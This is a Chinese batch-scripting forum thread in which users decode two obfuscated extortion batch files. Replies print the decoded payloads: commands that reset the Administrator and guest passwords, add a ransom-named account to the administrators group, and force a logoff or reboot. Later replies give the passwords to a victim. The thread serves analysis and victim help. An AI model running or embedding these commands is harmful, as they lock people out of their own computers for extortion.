设为首页收藏本站
切换到宽版

 找回密码
 注册
搜索
批处理之家»论坛 批处理专区: BAT CMD DOS BAT求助&讨论 [已解决]这两种批处理怎么解密
[新手上路]批处理新手入门导读[视频教程]批处理基础视频教程[视频教程]VBS基础视频教程[批处理精品]批处理版照片整理器
[批处理精品]纯批处理备份&还原驱动[批处理精品]CMD命令50条不能说的秘密[在线下载]第三方命令行工具[在线帮助]VBScript / JScript 在线参考
返回列表 发新帖
查看: 28809|回复: 9

[其他] [已解决]这两种批处理怎么解密

[复制链接]
Blitz
发表于 2017-10-10 16:22:56 | 显示全部楼层 |阅读模式
看过论坛里的帖子,知道文件头混淆加密的用copy nul+a.bat b.bat,用QBFC转成exe的用od设断点看路径,但是这两个批处理不会解。。。
上传附件了,注意!!!!!!这两个是别人发的敲竹杠,谨慎运行
回复

举报

0000
发表于 2017-10-10 19:59:00 | 显示全部楼层
看到名字就知道是病毒了
batgame.com ----- bat吧 (百度贴吧) 里的一个坑爹 病毒 作品
回复

举报

0000
发表于 2017-10-10 20:07:51 | 显示全部楼层
c:bat

  2. echo \xEF\x7E\x70\xC7\xCC\x3F\xE9\x56\x38...
  3. net user Administrator zfw123
  4. net user 要密码加QQ1845016856 zfw123 /add
  5. Shutdown -L
  6. echo \xEF\x7E\x70\xC7\xCC\x3F\xE9\x56\x38...
复制代码
回复

举报

老刘1号
发表于 2017-10-10 20:16:46 | 显示全部楼层
com文件直接rar打开
然而并没有加密,仅仅是混淆,73-75行为勒索代码
回复

举报

Blitz
 楼主| 发表于 2017-10-10 20:22:26 | 显示全部楼层
回复 4# 老刘1号


    能不能详细说说
回复

举报

见与不见
发表于 2017-10-12 23:21:38 | 显示全部楼层
本帖最后由 见与不见 于 2017-10-12 23:56 编辑

xx.COM里面是upx壳的命令行程序,解密:
  1. ECHO OFF
  2. net user Administrator CNM5418
  3. net user guest CNM5418
  4. net user 要密码加QQ1982949259 CNM5418 /add
  5. net localgroup administrators 要密码加QQ1982949259 /add
  6. shutdown -f -r -t 0
复制代码
bat脚本上面有已经给你解密了。


解密方法(鼠标戳一下)

评分

参与人数 2技术 +2 收起 理由
老刘1号 + 1 6
codegay + 1 1

查看全部评分

回复

举报

Blitz
 楼主| 发表于 2017-10-13 13:04:57 | 显示全部楼层
回复 6# 见与不见


    谢谢你!
回复

举报

1055367558
发表于 2017-10-13 19:08:29 | 显示全部楼层
回复 1# Blitz


    能说下密码吗?手贱点开了
回复

举报

见与不见
发表于 2017-10-13 19:39:54 | 显示全部楼层
回复 8# 1055367558


    密码在回帖里面都有
回复

举报

见与不见
发表于 2017-10-13 19:41:00 | 显示全部楼层
回复 9# 见与不见


    zfw123   或  CNM5418
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|批处理之家 ( 渝ICP备10000708号 )

GMT+8, 2026-3-19 23:39 , Processed in 0.019757 second(s), 8 queries , File On.

Powered by Discuz! X3.5

© 2001-2026 Discuz! Team.

快速回复 返回顶部 返回列表